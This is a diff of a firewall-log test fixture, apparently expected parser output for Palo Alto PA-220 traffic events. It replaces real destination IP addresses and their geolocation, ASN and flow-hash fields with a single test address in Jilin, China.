@@ -2488,27 +2512,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -2527,7 +2553,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2542,7 +2568,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -2616,14 +2642,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941842023Z", - "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031524600Z", + "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2646,27 +2672,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 161, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { 
@@ -2685,7 +2713,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2700,7 +2728,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -2722,7 +2750,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=" + "community_id": "1:26TJuKDYd30VKSNqMturHXRN7aU=" } }, "sequence_number": 32091128, @@ -2742,8 +2770,8 @@ ], "network": { "community_id": [ - "1:Jof66SUOY3j4C+WrZwbgtKls1/Y=", - "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=" + "1:LxppHna9qJmqS3k5notTeotpkFE=", + "1:26TJuKDYd30VKSNqMturHXRN7aU=" ], "transport": "udp", "application": "dns", 
@@ -2783,14 +2811,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:40:05.941845586Z", - "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031530100Z", + "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -2813,27 +2841,29 @@ "destination": { "nat": { "port": 443, - "ip": "98.138.49.44" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 36646, + "number": 4837, "organization": { - "name": "Oath Holdings Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 7805, - "ip": "98.138.49.44", + "ip": "175.16.199.1", "packets": 13 }, "rule": { 
@@ -2852,7 +2882,7 @@ "packets": 14, "ip": "192.168.15.224" }, - "message": "192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -2867,7 +2897,7 @@ "destination": { "nat": { "port": 443, - "ip": "98.138.49.44" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -2889,7 +2919,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:FfbVY/+5Mds7zDjSs5/Yfw5bxNQ=" + "community_id": "1:1fkY5RRVUI2gwig/WeMdrwk+rDY=" } }, "sequence_number": 32091129, @@ -2909,8 +2939,8 @@ ], "network": { "community_id": [ - "1:08BinpWe/JWymiOV0oCsRR8Lo4Q=", - "1:FfbVY/+5Mds7zDjSs5/Yfw5bxNQ=" + "1:bG1wqNG4Ax1y+YU0zveASH+qAnk=", + "1:1fkY5RRVUI2gwig/WeMdrwk+rDY=" ], "transport": "tcp", "application": "ssl", 
@@ -2950,14 +2980,14 @@ ], "ip": [ "192.168.15.224", - "98.138.49.44", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 17000000000, - "ingested": "2021-09-08T12:40:05.941849085Z", - "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031535500Z", + "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -2980,27 +3010,29 @@ "destination": { "nat": { "port": 443, - "ip": "72.30.3.43" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 26101, + "number": 4837, "organization": { - "name": "Oath Holdings Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 6106, - "ip": "72.30.3.43", + "ip": "175.16.199.1", "packets": 11 }, "rule": { @@ -3019,7 +3051,7 @@ "packets": 13, "ip": "192.168.15.224" }, - "message": "192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3034,7 +3066,7 @@ "destination": { "nat": { "port": 443, - "ip": "72.30.3.43" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -3056,7 +3088,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:TGvDRLypWuNWkuMsAxPzc5TSbAo=" + "community_id": "1:BAjwbfG6RvvWoYCU0ECKtnp8Rk4=" } }, "sequence_number": 32091130, 
@@ -3076,8 +3108,8 @@ ], "network": { "community_id": [ - "1:2NNXjZpDcB9oYU1TRLRSU5v7hoQ=", - "1:TGvDRLypWuNWkuMsAxPzc5TSbAo=" + "1:nXPS7U5xAcRDCiIlryWM4rEfFC8=", + "1:BAjwbfG6RvvWoYCU0ECKtnp8Rk4=" ], "transport": "tcp", "application": "ssl", @@ -3117,14 +3149,14 @@ ], "ip": [ "192.168.15.224", - "72.30.3.43", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 17000000000, - "ingested": "2021-09-08T12:40:05.941852548Z", - "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031541Z", + "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -3147,27 +3179,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 196, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 2 }, "rule": { @@ -3186,7 +3220,7 @@ "packets": 2, "ip": "192.168.15.196" }, - "message": "192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3201,7 +3235,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", 
@@ -3275,14 +3309,14 @@ ], "ip": [ "192.168.15.196", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941856116Z", - "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031546500Z", + "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -3305,27 +3339,29 @@ "destination": { "nat": { "port": 80, - "ip": "172.217.9.142" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 3245, - "ip": "172.217.9.142", + "ip": "175.16.199.1", "packets": 17 }, "rule": { 
@@ -3344,7 +3380,7 @@ "packets": 19, "ip": "192.168.15.224" }, - "message": "192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3359,7 +3395,7 @@ "destination": { "nat": { "port": 80, - "ip": "172.217.9.142" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -3381,7 +3417,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:NNgF+9vrbBFNpCI3JhUT4YWepd4=" + "community_id": "1:CqASRU4+LIyznvpnaQLFczr0paw=" } }, "sequence_number": 32091132, @@ -3401,8 +3437,8 @@ ], "network": { "community_id": [ - "1:JJQ4CQTTE3x7lV+Npo80V7dd6ts=", - "1:NNgF+9vrbBFNpCI3JhUT4YWepd4=" + "1:2Ml8h+9DWxjM3y1S0KDSnPUw5i8=", + "1:CqASRU4+LIyznvpnaQLFczr0paw=" ], "transport": "tcp", "application": "ocsp", 
@@ -3442,14 +3478,14 @@ ], "ip": [ "192.168.15.224", - "172.217.9.142", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 116000000000, - "ingested": "2021-09-08T12:40:05.941859639Z", - "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031551100Z", + "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -3472,27 +3508,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 179, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -3511,7 +3549,7 @@ "packets": 1, "ip": "192.168.15.207" }, - "message": "192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3526,7 +3564,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -3548,7 +3586,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:9T+RKr8xDB21pvAf/Fihyq72sLY=" + "community_id": "1:NSA2qdITGuu6//2R09CwIX3i8FE=" } }, "sequence_number": 32091133, 
@@ -3568,8 +3606,8 @@ ], "network": { "community_id": [ - "1:URR/wC9NPuHbnjGQ1Y7LffVYlTc=", - "1:9T+RKr8xDB21pvAf/Fihyq72sLY=" + "1:FlksUdaebhTer2TPcpfwCUq7loY=", + "1:NSA2qdITGuu6//2R09CwIX3i8FE=" ], "transport": "udp", "application": "dns", @@ -3609,14 +3647,14 @@ ], "ip": [ "192.168.15.207", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941863106Z", - "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031555400Z", + "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -3639,30 +3677,29 @@ "destination": { "nat": { "port": 443, - "ip": "54.84.80.198" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 4537, - "ip": "54.84.80.198", + "ip": "175.16.199.1", "packets": 12 }, "rule": { @@ -3681,7 +3718,7 @@ "packets": 13, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -3696,7 +3733,7 @@ "destination": { "nat": { "port": 443, - "ip": "54.84.80.198" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", 
